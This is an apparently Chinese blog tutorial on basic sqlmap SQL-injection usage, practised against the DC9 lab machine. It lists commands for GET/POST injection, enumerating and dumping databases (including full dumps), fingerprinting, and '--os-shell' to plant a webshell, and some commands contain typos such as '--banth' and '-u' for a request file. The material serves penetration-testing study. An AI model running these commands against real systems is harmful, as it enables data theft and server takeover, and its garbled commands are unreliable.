本文只介绍sqlmap的简单使用方法,参考官方文档
https://github.com/sqlmapproject/sqlmap/wiki/Usage
csdn师傅
https://blog.csdn.net/Breeze_CAT/article/details/80628392
个人建议,具体参数直接看csdn师傅的即可,本文以DC9靶场作为目标进行练习,使用sqlmap获取目标数据或权限
GET型
sqlmap -u http://192.168.43.143/ceshi.php?id=1 --banth --level 4
-u 输入自己的目标地址
--batch 自动输入选项的属性值
--level 设置测试的等级(1-5,默认为1)lv2:cookie注入; lv3:user-agent注入,lv4:refere注入; lv5:host注入
POST型
可以获取对应地址的请求包,使用bp抓包保存即可
sqlmap -u ceshi.txt --batch --level 4
或者
sqlmap -u http://192.168.43.143/results.php --method=POST --data="search=1" --level 4 --batch
--method 选择传参的方式
--data 选择传入的参数
sqlmap -u http://192.168.43.143/results.php --method=POST --data="search=1" --level 4 --batch --random-agent
--random-agent 采用随机UA头
sqlmap -r ceshi.txt --batch --current-db 查看当前数据库
--current-db 查看当前数据库
查询数据库内容
查看拥有的数据库名称
sqlmap -r ceshi.txt --batch --dbs --level 4
选择数据库,查询表名
sqlmap -r cesh.txt --batch -D shujuku --tables
查询表格内列名
sqlmap -r ceshi.txt --batch -D shjuku -T biao --columns
查看表格内某些列内容
sqlmap -r ceshi.txt --batch -D shujuku -T biao -C id,username --dump
--dump 下载的意思,前面跟的参数是需要下载的内容
sqlmap -r ceshi.txt --batch --dump-all
--dump-all 代表下载全部的意思,也就是脱裤操作
查看数据库,表格内容的对应关系
sqlmap -r ceshi.txt --schema
--schema 目标数据库数据库系统管理模式,类似于拓扑图的一种
写入木马,执行命令
sqlmap -r ceshi.txt --os-shell
sqlmap会自动查找路径写入shell
指纹识别
sqlmap -r ceshi.txt -f --dbs
当目标存在注入时,使用-f参数即可获取到目标的操作系统信息